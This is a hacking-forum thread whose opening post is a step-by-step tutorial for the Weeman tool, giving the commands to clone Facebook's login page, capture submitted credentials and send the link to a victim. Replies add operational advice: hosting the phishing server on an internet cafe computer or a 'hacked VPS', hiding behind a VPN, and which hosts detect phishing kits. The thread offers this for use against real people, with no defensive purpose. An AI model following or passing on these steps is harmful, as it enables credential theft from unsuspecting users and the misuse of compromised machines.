Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Tutorial Weeman: Best Tool For Creating Phishing Pages filter_list
Author
Message
Weeman: Best Tool For Creating Phishing Pages #1
This article was written for my blog and I am sharing it with you people...
Today I am posting a tutorial related to a tool called Weeman. I found this tool while searching for some other tools and I found this very useful.

What is Weeman
Weeman is HTTP server written in python for creating phishing pages.

How Weeman Works
Create fake html page.
Wait for clients
Grab the data (POST).
Try to login the client to the original page

Things we need
Any Linux operating system with Python 2.7 installed. In my case I am using Kali Linux 2.
Internet Connection.

Follow the given tutorial
1. First we will download the Weeman tool, for this open your terminal and  type the following commands
Quote:git clone https://github.com/Hypsurus/weeman

2. Now change the directory to download weeman directory.

Quote:cd weeman

3. Open weeman using following command

Quote:./weeman.py

[Image: p1.png]
4. Now type the following commands to create the phishing page of the website.
Quote:set url http://www.facebook.com
set port 8080
set action_url http://www.facebook.com
run
here you can change http://www.facebook.com to any other site which you want to clone.
[Image: p2.png]
5. Now send the your ipaddress as a link to your victim.
Quote:Example 192.168.2.13:8080
You can also use your public ip to make it work on WAN or internet but you have to port forward your router.

Note:
1. Make sure net is connected.
2. Python must be installed.
(This post was last modified: 10-01-2016, 06:50 PM by D@rk TruTH.)

[+] 1 user Likes D@rk TruTH's post
Reply

RE: Weeman: Best Tool For Creating Phishing Pages #2
CAn you set this up on a public computer?

Reply

RE: Weeman: Best Tool For Creating Phishing Pages #3
Nice tutorial, didn't see this before. I guess I missed it, too bad since its a nice formatted tutorial. Thank you for the share.

(10-03-2016, 12:28 PM)dangermouse Wrote: CAn you set this up on a public computer?

Of course you could, depends on the security of the PC though but why would you want to set this up on a public computer? Just use a VPS or something? Otherwise you might have to go everytime to the computer to get the logs you collected.
~~ Might be back? ~~

Reply

RE: Weeman: Best Tool For Creating Phishing Pages #4
(10-03-2016, 12:59 PM)Bish0pQ Wrote: Nice tutorial, didn't see this before. I guess I missed it, too bad since its a nice formatted tutorial. Thank you for the share.

(10-03-2016, 12:28 PM)dangermouse Wrote: CAn you set this up on a public computer?

Of course you could, depends on the security of the PC though but why would you want to set this up on a public computer? Just use a VPS or something? Otherwise you might have to go everytime to the computer to get the logs you collected.

I have a internet cafe around the corner that is never busy. I thought it would be more secure that way to just intermittently collect the logs

Reply

RE: Weeman: Best Tool For Creating Phishing Pages #5
(10-03-2016, 01:05 PM)dangermouse Wrote:
(10-03-2016, 12:59 PM)Bish0pQ Wrote: Nice tutorial, didn't see this before. I guess I missed it, too bad since its a nice formatted tutorial. Thank you for the share.

(10-03-2016, 12:28 PM)dangermouse Wrote: CAn you set this up on a public computer?

Of course you could, depends on the security of the PC though but why would you want to set this up on a public computer? Just use a VPS or something? Otherwise you might have to go everytime to the computer to get the logs you collected.

I have a internet cafe around the corner that is never busy. I thought it would be more secure that way to just intermittently collect the logs

You also have to check things like opening hours. For example if its only open during the day, they will probably shutdown the PC's at night, that way you would have to set it up everyday again. If you have administrator access you could do more probable, like run it automatically. I would just recommend using a hacked VPS or something.

I don't really think that you have to secure it that good. I mean you only have to collect the logs when you set it up somewhere, if you use a VPN for that you will be already "safe".
~~ Might be back? ~~

Reply

RE: Weeman: Best Tool For Creating Phishing Pages #6
Wouldn´t it just be easier to use kali and SEtoolkit ?

Reply

RE: Weeman: Best Tool For Creating Phishing Pages #7
(10-05-2016, 03:03 PM)Amadeus Wrote: Wouldn´t it just be easier to use kali and SEtoolkit ?

Yes, SEToolkit is a pretty good tool as well BUT if you use that tool and upload it to some hosts it gets detected.
Not with all sites though. For example I uploaded a Facebook and Netflix phisher onto hostinger (a hosting company) and they flagged it right away and my account was banned without notice.

I don't know if this is the same with this tool though.
~~ Might be back? ~~

Reply

RE: Weeman: Best Tool For Creating Phishing Pages #8
Reminded me of the other Weeman.

[Image: fSEZXPs.png]

[+] 1 user Likes Dismas's post
Reply

RE: Weeman: Best Tool For Creating Phishing Pages #9
(10-05-2016, 11:31 PM)Oni Wrote: Reminded me of the other Weeman.


Jack - ASS

Reply







Users browsing this thread: 1 Guest(s)